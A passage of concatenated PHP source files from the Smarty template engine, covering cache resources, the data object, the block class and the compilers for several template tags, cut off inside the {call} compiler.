    public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached)
    {
        $cached->is_locked = false;
        $key = 'LOCK#' . $cached->filepath;
        $this->delete(array($key));
    }

    /**
     * Read values for a set of keys from cache
     *
     * @param array $keys list of keys to fetch
     *
     * @return array list of values with the given keys used as indexes
     */
    abstract protected function read(array $keys);

    /**
     * Save values for a set of keys to cache
     *
     * @param array $keys   list of values to save
     * @param int   $expire expiration time
     *
     * @return boolean true on success, false on failure
     */
    abstract protected function write(array $keys, $expire = null);

    /**
     * Remove values from cache
     *
     * @param array $keys list of keys to delete
     *
     * @return boolean true on success, false on failure
     */
    abstract protected function delete(array $keys);

    /**
     * Remove *all* values from cache
     *
     * @return boolean true on success, false on failure
     */
    protected function purge()
    {
        return false;
    }
}
<?php
/**
 * Smarty Plugin Data
 * This file contains the data object
 *
 * @package    Smarty
 * @subpackage Template
 * @author     Uwe Tews
 */

/**
 * class for the Smarty data object
 * The Smarty data object will hold Smarty variables in the current scope
 *
 * @package    Smarty
 * @subpackage Template
 */
class Smarty_Data extends Smarty_Internal_Data
{
    /**
     * Counter
     *
     * @var int
     */
    public static $count = 0;

    /**
     * Data block name
     *
     * @var string
     */
    public $dataObjectName = '';

    /**
     * Smarty object
     *
     * @var Smarty
     */
    public $smarty = null;

    /**
     * create Smarty data object
     *
     * @param Smarty|array                    $_parent parent template
     * @param Smarty|Smarty_Internal_Template $smarty  global smarty instance
     * @param string                          $name    optional data block name
     *
     * @throws SmartyException
     */
    public function __construct($_parent = null, $smarty = null, $name = null)
    {
        parent::__construct();
        self::$count++;
        $this->dataObjectName = 'Data_object ' . (isset($name) ? "'{$name}'" : self::$count);
        $this->smarty = $smarty;
        if (is_object($_parent)) {
            // when object set up back pointer
            $this->parent = $_parent;
        } elseif (is_array($_parent)) {
            // set up variable values
            foreach ($_parent as $_key => $_val) {
                $this->tpl_vars[ $_key ] = new Smarty_Variable($_val);
            }
        } elseif ($_parent !== null) {
            throw new SmartyException('Wrong type for template variables');
        }
    }
}
<?php

/**
 * Smarty {block} tag class
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Block
{
    /**
     * Block name
     *
     * @var string
     */
    public $name = '';

    /**
     * Hide attribute
     *
     * @var bool
     */
    public $hide = false;

    /**
     * Append attribute
     *
     * @var bool
     */
    public $append = false;

    /**
     * prepend attribute
     *
     * @var bool
     */
    public $prepend = false;

    /**
     * Block calls $smarty.block.child
     *
     * @var bool
     */
    public $callsChild = false;

    /**
     * Inheritance child block
     *
     * @var Smarty_Internal_Block|null
     */
    public $child = null;

    /**
     * Inheritance calling parent block
     *
     * @var Smarty_Internal_Block|null
     */
    public $parent = null;

    /**
     * Inheritance Template index
     *
     * @var int
     */
    public $tplIndex = 0;

    /**
     * Smarty_Internal_Block constructor.
     * - if outer level {block} of child template ($state === 1) save it as child root block
     * - otherwise process inheritance and render
     *
     * @param string   $name     block name
     * @param int|null $tplIndex index of outer level {block} if nested
     */
    public function __construct($name, $tplIndex)
    {
        $this->name = $name;
        $this->tplIndex = $tplIndex;
    }

    /**
     * Compiled block code overloaded by {block} class
     *
     * @param \Smarty_Internal_Template $tpl
     */
    public function callBlock(Smarty_Internal_Template $tpl)
    {
    }
}
<?php
/**
 * Smarty Internal Plugin CacheResource File
 *
 * @package    Smarty
 * @subpackage Cacher
 * @author     Uwe Tews
 * @author     Rodney Rehm
 */

/**
 * This class does contain all necessary methods for the HTML cache on file system
 * Implements the file system as resource for the HTML cache Version ussing nocache inserts.
 *
 * @package    Smarty
 * @subpackage Cacher
 */
class Smarty_Internal_CacheResource_File extends Smarty_CacheResource
{
    /**
     * populate Cached Object with meta data from Resource
     *
     * @param Smarty_Template_Cached   $cached    cached object
     * @param Smarty_Internal_Template $_template template object
     *
     * @return void
     */
    public function populate(Smarty_Template_Cached $cached, Smarty_Internal_Template $_template)
    {
        $source = &$_template->source;
        $smarty = &$_template->smarty;
        $_compile_dir_sep = $smarty->use_sub_dirs ? DIRECTORY_SEPARATOR : '^';
        $_filepath = sha1($source->uid . $smarty->_joined_template_dir);
        $cached->filepath = $smarty->getCacheDir();
        if (isset($_template->cache_id)) {
            $cached->filepath .= preg_replace(
                                     array(
                                         '![^\w|]+!',
                                         '![|]+!'
                                     ),
                                     array(
                                         '_',
                                         $_compile_dir_sep
                                     ),
                                     $_template->cache_id
                                 ) . $_compile_dir_sep;
        }
        if (isset($_template->compile_id)) {
            $cached->filepath .= preg_replace('![^\w]+!', '_', $_template->compile_id) . $_compile_dir_sep;
        }
        // if use_sub_dirs, break file into directories
        if ($smarty->use_sub_dirs) {
            $cached->filepath .= $_filepath[ 0 ] . $_filepath[ 1 ] . DIRECTORY_SEPARATOR . $_filepath[ 2 ] .
                                 $_filepath[ 3 ] .
                                 DIRECTORY_SEPARATOR .
                                 $_filepath[ 4 ] . $_filepath[ 5 ] . DIRECTORY_SEPARATOR;
        }
        $cached->filepath .= $_filepath;
        $basename = $source->handler->getBasename($source);
        if (!empty($basename)) {
            $cached->filepath .= '.' . $basename;
        }
        if ($smarty->cache_locking) {
            $cached->lock_id = $cached->filepath . '.lock';
        }
        $cached->filepath .= '.php';
        $cached->timestamp = $cached->exists = is_file($cached->filepath);
        if ($cached->exists) {
            $cached->timestamp = filemtime($cached->filepath);
        }
    }

    /**
     * populate Cached Object with timestamp and exists from Resource
     *
     * @param Smarty_Template_Cached $cached cached object
     *
     * @return void
     */
    public function populateTimestamp(Smarty_Template_Cached $cached)
    {
        $cached->timestamp = $cached->exists = is_file($cached->filepath);
        if ($cached->exists) {
            $cached->timestamp = filemtime($cached->filepath);
        }
    }

    /**
     * Read the cached template and process its header
     *
     * @param \Smarty_Internal_Template   $_smarty_tpl do not change variable name, is used by compiled template
     * @param Smarty_Template_Cached|null $cached      cached object
     * @param bool                        $update      flag if called because cache update
     *
     * @return boolean true or false if the cached content does not exist
     */
    public function process(
        Smarty_Internal_Template $_smarty_tpl,
        ?Smarty_Template_Cached $cached = null,
        $update = false
    ) {
        $_smarty_tpl->cached->valid = false;
        if ($update && defined('HHVM_VERSION')) {
            eval('?>' . file_get_contents($_smarty_tpl->cached->filepath));
            return true;
        } else {
            return @include $_smarty_tpl->cached->filepath;
        }
    }

    /**
     * Write the rendered template output to cache
     *
     * @param Smarty_Internal_Template $_template template object
     * @param string                   $content   content to cache
     *
     * @return bool success
     * @throws \SmartyException
     */
    public function writeCachedContent(Smarty_Internal_Template $_template, $content)
    {
        if ($_template->smarty->ext->_writeFile->writeFile(
                $_template->cached->filepath,
                $content,
                $_template->smarty
            ) === true
        ) {
            if (function_exists('opcache_invalidate')
                && (!function_exists('ini_get') || strlen(ini_get('opcache.restrict_api'))) < 1
            ) {
                opcache_invalidate($_template->cached->filepath, true);
            } elseif (function_exists('apc_compile_file')) {
                apc_compile_file($_template->cached->filepath);
            }
            $cached = $_template->cached;
            $cached->timestamp = $cached->exists = is_file($cached->filepath);
            if ($cached->exists) {
                $cached->timestamp = filemtime($cached->filepath);
                return true;
            }
        }
        return false;
    }

    /**
     * Read cached template from cache
     *
     * @param Smarty_Internal_Template $_template template object
     *
     * @return string  content
     */
    public function readCachedContent(Smarty_Internal_Template $_template)
    {
        if (is_file($_template->cached->filepath)) {
            return file_get_contents($_template->cached->filepath);
        }
        return false;
    }

    /**
     * Empty cache
     *
     * @param Smarty  $smarty
     * @param integer $exp_time expiration time (number of seconds, not timestamp)
     *
     * @return integer number of cache files deleted
     */
    public function clearAll(Smarty $smarty, $exp_time = null)
    {
        return $smarty->ext->_cacheResourceFile->clear($smarty, null, null, null, $exp_time);
    }

    /**
     * Empty cache for a specific template
     *
     * @param Smarty  $smarty
     * @param string  $resource_name template name
     * @param string  $cache_id      cache id
     * @param string  $compile_id    compile id
     * @param integer $exp_time      expiration time (number of seconds, not timestamp)
     *
     * @return integer number of cache files deleted
     */
    public function clear(Smarty $smarty, $resource_name, $cache_id, $compile_id, $exp_time)
    {
        return $smarty->ext->_cacheResourceFile->clear($smarty, $resource_name, $cache_id, $compile_id, $exp_time);
    }

    /**
     * Check is cache is locked for this template
     *
     * @param Smarty                 $smarty Smarty object
     * @param Smarty_Template_Cached $cached cached object
     *
     * @return boolean true or false if cache is locked
     */
    public function hasLock(Smarty $smarty, Smarty_Template_Cached $cached)
    {
        clearstatcache(true, $cached->lock_id ?? '');
        if (null !== $cached->lock_id && is_file($cached->lock_id)) {
            $t = filemtime($cached->lock_id);
            return $t && (time() - $t < $smarty->locking_timeout);
        } else {
            return false;
        }
    }

    /**
     * Lock cache for this template
     *
     * @param Smarty                 $smarty Smarty object
     * @param Smarty_Template_Cached $cached cached object
     *
     * @return bool|void
     */
    public function acquireLock(Smarty $smarty, Smarty_Template_Cached $cached)
    {
        $cached->is_locked = true;
        touch($cached->lock_id);
    }

    /**
     * Unlock cache for this template
     *
     * @param Smarty                 $smarty Smarty object
     * @param Smarty_Template_Cached $cached cached object
     *
     * @return bool|void
     */
    public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached)
    {
        $cached->is_locked = false;
        @unlink($cached->lock_id);
    }
}
<?php
/**
 * Smarty Internal Plugin CompileBase
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * This class does extend all internal compile plugins
 *
 * @package    Smarty
 * @subpackage Compiler
 */
abstract class Smarty_Internal_CompileBase
{
    /**
     * Array of names of required attribute required by tag
     *
     * @var array
     */
    public $required_attributes = array();

    /**
     * Array of names of optional attribute required by tag
     * use array('_any') if there is no restriction of attributes names
     *
     * @var array
     */
    public $optional_attributes = array();

    /**
     * Shorttag attribute order defined by its names
     *
     * @var array
     */
    public $shorttag_order = array();

    /**
     * Array of names of valid option flags
     *
     * @var array
     */
    public $option_flags = array('nocache');

    /**
     * Mapping array for boolean option value
     *
     * @var array
     */
    public $optionMap = array(1 => true, 0 => false, 'true' => true, 'false' => false);

    /**
     * Mapping array with attributes as key
     *
     * @var array
     */
    public $mapCache = array();

    /**
     * This function checks if the attributes passed are valid
     * The attributes passed for the tag to compile are checked against the list of required and
     * optional attributes. Required attributes must be present. Optional attributes are check against
     * the corresponding list. The keyword '_any' specifies that any attribute will be accepted
     * as valid
     *
     * @param object $compiler   compiler object
     * @param array  $attributes attributes applied to the tag
     *
     * @return array  of mapped attributes for further processing
     */
    public function getAttributes($compiler, $attributes)
    {
        $_indexed_attr = array();
        if (!isset($this->mapCache[ 'option' ])) {
            $this->mapCache[ 'option' ] = array_fill_keys($this->option_flags, true);
        }
        foreach ($attributes as $key => $mixed) {
            // shorthand ?
            if (!is_array($mixed)) {
                // option flag ?
                if (isset($this->mapCache[ 'option' ][ trim($mixed, '\'"') ])) {
                    $_indexed_attr[ trim($mixed, '\'"') ] = true;
                    // shorthand attribute ?
                } elseif (isset($this->shorttag_order[ $key ])) {
                    $_indexed_attr[ $this->shorttag_order[ $key ] ] = $mixed;
                } else {
                    // too many shorthands
                    $compiler->trigger_template_error('too many shorthand attributes', null, true);
                }
                // named attribute
            } else {
                foreach ($mixed as $k => $v) {
                    // option flag?
                    if (isset($this->mapCache[ 'option' ][ $k ])) {
                        if (is_bool($v)) {
                            $_indexed_attr[ $k ] = $v;
                        } else {
                            if (is_string($v)) {
                                $v = trim($v, '\'" ');
                            }
                            if (isset($this->optionMap[ $v ])) {
                                $_indexed_attr[ $k ] = $this->optionMap[ $v ];
                            } else {
                                $compiler->trigger_template_error(
                                    "illegal value '" . var_export($v, true) .
                                    "' for option flag '{$k}'",
                                    null,
                                    true
                                );
                            }
                        }
                        // must be named attribute
                    } else {
                        $_indexed_attr[ $k ] = $v;
                    }
                }
            }
        }
        // check if all required attributes present
        foreach ($this->required_attributes as $attr) {
            if (!isset($_indexed_attr[ $attr ])) {
                $compiler->trigger_template_error("missing '{$attr}' attribute", null, true);
            }
        }
        // check for not allowed attributes
        if ($this->optional_attributes !== array('_any')) {
            if (!isset($this->mapCache[ 'all' ])) {
                $this->mapCache[ 'all' ] =
                    array_fill_keys(
                        array_merge(
                            $this->required_attributes,
                            $this->optional_attributes,
                            $this->option_flags
                        ),
                        true
                    );
            }
            foreach ($_indexed_attr as $key => $dummy) {
                if (!isset($this->mapCache[ 'all' ][ $key ]) && $key !== 0) {
                    $compiler->trigger_template_error("unexpected '{$key}' attribute", null, true);
                }
            }
        }
        // default 'false' for all option flags not set
        foreach ($this->option_flags as $flag) {
            if (!isset($_indexed_attr[ $flag ])) {
                $_indexed_attr[ $flag ] = false;
            }
        }
        if (isset($_indexed_attr[ 'nocache' ]) && $_indexed_attr[ 'nocache' ]) {
            $compiler->tag_nocache = true;
        }
        return $_indexed_attr;
    }

    /**
     * Push opening tag name on stack
     * Optionally additional data can be saved on stack
     *
     * @param object $compiler compiler object
     * @param string $openTag  the opening tag's name
     * @param mixed  $data     optional data saved
     */
    public function openTag($compiler, $openTag, $data = null)
    {
        array_push($compiler->_tag_stack, array($openTag, $data));
    }

    /**
     * Pop closing tag
     * Raise an error if this stack-top doesn't match with expected opening tags
     *
     * @param object       $compiler    compiler object
     * @param array|string $expectedTag the expected opening tag names
     *
     * @return mixed        any type the opening tag's name or saved data
     */
    public function closeTag($compiler, $expectedTag)
    {
        if (count($compiler->_tag_stack) > 0) {
            // get stacked info
            list($_openTag, $_data) = array_pop($compiler->_tag_stack);
            // open tag must match with the expected ones
            if (in_array($_openTag, (array)$expectedTag)) {
                if (is_null($_data)) {
                    // return opening tag
                    return $_openTag;
                } else {
                    // return restored data
                    return $_data;
                }
            }
            // wrong nesting of tags
            $compiler->trigger_template_error("unclosed '{$compiler->smarty->left_delimiter}{$_openTag}{$compiler->smarty->right_delimiter}' tag");
            return;
        }
        // wrong nesting of tags
        $compiler->trigger_template_error('unexpected closing tag', null, true);
        return;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Append
 * Compiles the {append} tag
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Append Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Append extends Smarty_Internal_Compile_Assign
{
    /**
     * Compiles code for the {append} tag
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter)
    {
        // the following must be assigned at runtime because it will be overwritten in parent class
        $this->required_attributes = array('var', 'value');
        $this->shorttag_order = array('var', 'value');
        $this->optional_attributes = array('scope', 'index');
        $this->mapCache = array();
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        // map to compile assign attributes
        if (isset($_attr[ 'index' ])) {
            $_params[ 'smarty_internal_index' ] = '[' . $_attr[ 'index' ] . ']';
            unset($_attr[ 'index' ]);
        } else {
            $_params[ 'smarty_internal_index' ] = '[]';
        }
        $_new_attr = array();
        foreach ($_attr as $key => $value) {
            $_new_attr[] = array($key => $value);
        }
        // call compile assign
        return parent::compile($_new_attr, $compiler, $_params);
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Assign
 * Compiles the {assign} tag
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Assign Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Assign extends Smarty_Internal_CompileBase
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $option_flags = array('nocache', 'noscope');

    /**
     * Valid scope names
     *
     * @var array
     */
    public $valid_scopes = array(
        'local'    => Smarty::SCOPE_LOCAL, 'parent' => Smarty::SCOPE_PARENT,
        'root'     => Smarty::SCOPE_ROOT, 'global' => Smarty::SCOPE_GLOBAL,
        'tpl_root' => Smarty::SCOPE_TPL_ROOT, 'smarty' => Smarty::SCOPE_SMARTY
    );

    /**
     * Compiles code for the {assign} tag
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter)
    {
        // the following must be assigned at runtime because it will be overwritten in Smarty_Internal_Compile_Append
        $this->required_attributes = array('var', 'value');
        $this->shorttag_order = array('var', 'value');
        $this->optional_attributes = array('scope');
        $this->mapCache = array();
        $_nocache = false;
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        // nocache ?
        if ($_var = $compiler->getId($_attr[ 'var' ])) {
            $_var = "'{$_var}'";
        } else {
            $_var = $_attr[ 'var' ];
        }
        if ($compiler->tag_nocache || $compiler->nocache) {
            $_nocache = true;
            // create nocache var to make it know for further compiling
            $compiler->setNocacheInVariable($_attr[ 'var' ]);
        }
        // scope setup
        if ($_attr[ 'noscope' ]) {
            $_scope = -1;
        } else {
            $_scope = $compiler->convertScope($_attr, $this->valid_scopes);
        }
        // optional parameter
        $_params = '';
        if ($_nocache || $_scope) {
            $_params .= ' ,' . var_export($_nocache, true);
        }
        if ($_scope) {
            $_params .= ' ,' . $_scope;
        }
        if (isset($parameter[ 'smarty_internal_index' ])) {
            $output =
                "<?php \$_tmp_array = isset(\$_smarty_tpl->tpl_vars[{$_var}]) ? \$_smarty_tpl->tpl_vars[{$_var}]->value : array();\n";
            $output .= "if (!(is_array(\$_tmp_array) || \$_tmp_array instanceof ArrayAccess)) {\n";
            $output .= "settype(\$_tmp_array, 'array');\n";
            $output .= "}\n";
            $output .= "\$_tmp_array{$parameter['smarty_internal_index']} = {$_attr['value']};\n";
            $output .= "\$_smarty_tpl->_assignInScope({$_var}, \$_tmp_array{$_params});?>";
        } else {
            $output = "<?php \$_smarty_tpl->_assignInScope({$_var}, {$_attr['value']}{$_params});?>";
        }
        return $output;
    }
}
<?php
/**
 * This file is part of Smarty.
 *
 * (c) 2015 Uwe Tews
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

/**
 * Smarty Internal Plugin Compile Block Class
 *
 * @author Uwe Tews <uwe.tews@googlemail.com>
 */
class Smarty_Internal_Compile_Block extends Smarty_Internal_Compile_Shared_Inheritance
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $required_attributes = array('name');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $shorttag_order = array('name');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $option_flags = array('hide', 'nocache');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('assign');

    /**
     * Compiles code for the {block} tag
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter)
    {
        if (!isset($compiler->_cache[ 'blockNesting' ])) {
            $compiler->_cache[ 'blockNesting' ] = 0;
        }
        if ($compiler->_cache[ 'blockNesting' ] === 0) {
            // make sure that inheritance gets initialized in template code
            $this->registerInit($compiler);
            $this->option_flags = array('hide', 'nocache', 'append', 'prepend');
        } else {
            $this->option_flags = array('hide', 'nocache');
        }
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        ++$compiler->_cache[ 'blockNesting' ];
        $_className = 'Block_' . preg_replace('![^\w]+!', '_', uniqid(mt_rand(), true));
        $compiler->_cache[ 'blockName' ][ $compiler->_cache[ 'blockNesting' ] ] = $_attr[ 'name' ];
        $compiler->_cache[ 'blockClass' ][ $compiler->_cache[ 'blockNesting' ] ] = $_className;
        $compiler->_cache[ 'blockParams' ][ $compiler->_cache[ 'blockNesting' ] ] = array();
        $compiler->_cache[ 'blockParams' ][ 1 ][ 'subBlocks' ][ trim($_attr[ 'name' ], '"\'') ][] = $_className;
        $this->openTag(
            $compiler,
            'block',
            array(
                $_attr, $compiler->nocache, $compiler->parser->current_buffer,
                $compiler->template->compiled->has_nocache_code,
                $compiler->template->caching
            )
        );
        $compiler->saveRequiredPlugins(true);
        $compiler->nocache = $compiler->nocache | $compiler->tag_nocache;
        $compiler->parser->current_buffer = new Smarty_Internal_ParseTree_Template();
        $compiler->template->compiled->has_nocache_code = false;
        $compiler->suppressNocacheProcessing = true;
    }
}

/**
 * Smarty Internal Plugin Compile BlockClose Class
 */
class Smarty_Internal_Compile_Blockclose extends Smarty_Internal_Compile_Shared_Inheritance
{
    /**
     * Compiles code for the {/block} tag
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     *
     * @return bool true
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter)
    {
        list($_attr, $_nocache, $_buffer, $_has_nocache_code, $_caching) = $this->closeTag($compiler, array('block'));
        // init block parameter
        $_block = $compiler->_cache[ 'blockParams' ][ $compiler->_cache[ 'blockNesting' ] ];
        unset($compiler->_cache[ 'blockParams' ][ $compiler->_cache[ 'blockNesting' ] ]);
        $_name = $_attr[ 'name' ];
        $_assign = isset($_attr[ 'assign' ]) ? $_attr[ 'assign' ] : null;
        unset($_attr[ 'assign' ], $_attr[ 'name' ]);
        foreach ($_attr as $name => $stat) {
            if ((is_bool($stat) && $stat !== false) || (!is_bool($stat) && $stat !== 'false')) {
                $_block[ $name ] = 'true';
            }
        }
        $_className = $compiler->_cache[ 'blockClass' ][ $compiler->_cache[ 'blockNesting' ] ];
        // get compiled block code
        $_functionCode = $compiler->parser->current_buffer;
        // setup buffer for template function code
        $compiler->parser->current_buffer = new Smarty_Internal_ParseTree_Template();
        $output = "<?php\n";
        $output .= $compiler->cStyleComment(" {block {$_name}} ") . "\n";
        $output .= "class {$_className} extends Smarty_Internal_Block\n";
        $output .= "{\n";
        foreach ($_block as $property => $value) {
            $output .= "public \${$property} = " . var_export($value, true) . ";\n";
        }
        $output .= "public function callBlock(Smarty_Internal_Template \$_smarty_tpl) {\n";
        $output .= $compiler->compileRequiredPlugins();
        $compiler->restoreRequiredPlugins();
        if ($compiler->template->compiled->has_nocache_code) {
            $output .= "\$_smarty_tpl->cached->hashes['{$compiler->template->compiled->nocache_hash}'] = true;\n";
        }
        if (isset($_assign)) {
            $output .= "ob_start();\n";
        }
        $output .= "?>\n";
        $compiler->parser->current_buffer->append_subtree(
            $compiler->parser,
            new Smarty_Internal_ParseTree_Tag(
                $compiler->parser,
                $output
            )
        );
        $compiler->parser->current_buffer->append_subtree($compiler->parser, $_functionCode);
        $output = "<?php\n";
        if (isset($_assign)) {
            $output .= "\$_smarty_tpl->assign({$_assign}, ob_get_clean());\n";
        }
        $output .= "}\n";
        $output .= "}\n";
        $output .= $compiler->cStyleComment(" {/block {$_name}} ") . "\n\n";
        $output .= "?>\n";
        $compiler->parser->current_buffer->append_subtree(
            $compiler->parser,
            new Smarty_Internal_ParseTree_Tag(
                $compiler->parser,
                $output
            )
        );
        $compiler->blockOrFunctionCode .= $compiler->parser->current_buffer->to_smarty_php($compiler->parser);
        $compiler->parser->current_buffer = new Smarty_Internal_ParseTree_Template();
        // restore old status
        $compiler->template->compiled->has_nocache_code = $_has_nocache_code;
        $compiler->tag_nocache = $compiler->nocache;
        $compiler->nocache = $_nocache;
        $compiler->parser->current_buffer = $_buffer;
        $output = "<?php \n";
        if ($compiler->_cache[ 'blockNesting' ] === 1) {
            $output .= "\$_smarty_tpl->inheritance->instanceBlock(\$_smarty_tpl, '$_className', $_name);\n";
        } else {
            $output .= "\$_smarty_tpl->inheritance->instanceBlock(\$_smarty_tpl, '$_className', $_name, \$this->tplIndex);\n";
        }
        $output .= "?>\n";
        --$compiler->_cache[ 'blockNesting' ];
        if ($compiler->_cache[ 'blockNesting' ] === 0) {
            unset($compiler->_cache[ 'blockNesting' ]);
        }
        $compiler->has_code = true;
        $compiler->suppressNocacheProcessing = true;
        return $output;
    }
}
<?php
/**
 * This file is part of Smarty.
 *
 * (c) 2015 Uwe Tews
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

/**
 * Smarty Internal Plugin Compile Block Child Class
 *
 * @author Uwe Tews <uwe.tews@googlemail.com>
 */
class Smarty_Internal_Compile_Block_Child extends Smarty_Internal_Compile_Child
{
    /**
     * Tag name
     *
     * @var string
     */
    public $tag = 'block_child';
}
<?php
/**
 * This file is part of Smarty.
 *
 * (c) 2015 Uwe Tews
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

/**
 * Smarty Internal Plugin Compile Block Parent Class
 *
 * @author Uwe Tews <uwe.tews@googlemail.com>
 */
class Smarty_Internal_Compile_Block_Parent extends Smarty_Internal_Compile_Child
{
    /**
     * Tag name
     *
     * @var string
     */
    public $tag = 'block_parent';

    /**
     * Block type
     *
     * @var string
     */
    public $blockType = 'Parent';
}
<?php
/**
 * Smarty Internal Plugin Compile Break
 * Compiles the {break} tag
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Break Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Break extends Smarty_Internal_CompileBase
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('levels');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $shorttag_order = array('levels');

    /**
     * Tag name may be overloaded by Smarty_Internal_Compile_Continue
     *
     * @var string
     */
    public $tag = 'break';

    /**
     * Compiles code for the {break} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        list($levels, $foreachLevels) = $this->checkLevels($args, $compiler);
        $output = "<?php ";
        if ($foreachLevels > 0 && $this->tag === 'continue') {
            $foreachLevels--;
        }
        if ($foreachLevels > 0) {
            /* @var Smarty_Internal_Compile_Foreach $foreachCompiler */
            $foreachCompiler = $compiler->getTagCompiler('foreach');
            $output .= $foreachCompiler->compileRestore($foreachLevels);
        }
        $output .= "{$this->tag} {$levels};?>";
        return $output;
    }

    /**
     * check attributes and return array of break and foreach levels
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return array
     * @throws \SmartyCompilerException
     */
    public function checkLevels($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        static $_is_loopy = array('for' => true, 'foreach' => true, 'while' => true, 'section' => true);
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        if ($_attr[ 'nocache' ] === true) {
            $compiler->trigger_template_error('nocache option not allowed', null, true);
        }
        if (isset($_attr[ 'levels' ])) {
            if (!is_numeric($_attr[ 'levels' ])) {
                $compiler->trigger_template_error('level attribute must be a numeric constant', null, true);
            }
            $levels = $_attr[ 'levels' ];
        } else {
            $levels = 1;
        }
        $level_count = $levels;
        $stack_count = count($compiler->_tag_stack) - 1;
        $foreachLevels = 0;
        $lastTag = '';
        while ($level_count > 0 && $stack_count >= 0) {
            if (isset($_is_loopy[ $compiler->_tag_stack[ $stack_count ][ 0 ] ])) {
                $lastTag = $compiler->_tag_stack[ $stack_count ][ 0 ];
                if ($level_count === 0) {
                    break;
                }
                $level_count--;
                if ($compiler->_tag_stack[ $stack_count ][ 0 ] === 'foreach') {
                    $foreachLevels++;
                }
            }
            $stack_count--;
        }
        if ($level_count !== 0) {
            $compiler->trigger_template_error("cannot {$this->tag} {$levels} level(s)", null, true);
        }
        if ($lastTag === 'foreach' && $this->tag === 'break' && $foreachLevels > 0) {
            $foreachLevels--;
        }
        return array($levels, $foreachLevels);
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Function_Call
 * Compiles the calls of user defined tags defined by {function}
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Function_Call Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Call extends Smarty_Internal_CompileBase
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $required_attributes = array('name');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $shorttag_order = array('name');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('_any');

    /**
     * Compiles the calls of user defined tags defined by {function}
     *
     * @param array  $args     array with attributes from parser
     * @param object $compiler compiler object
     *
     * @return string compiled code
     */
    public function compile($args, $compiler)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        // save possible attributes
        if (isset($_attr[ 'assign' ])) {
            // output will be stored in a smarty variable instead of being displayed
            $_assign = $_attr[ 'assign' ];
        }
        //$_name = trim($_attr['name'], "''");
        $_name = $_attr[ 'name' ];
        unset($_attr[ 'name' ], $_attr[ 'assign' ], $_attr[ 'nocache' ]);
        // set flag (compiled code of {function} must be included in cache file
        if (!$compiler->template->caching || $compiler->nocache || $compiler->tag_nocache) {
            $_nocache = 'true';
        } else {
            $_nocache = 'false';
        }
        $_paramsArray = array();
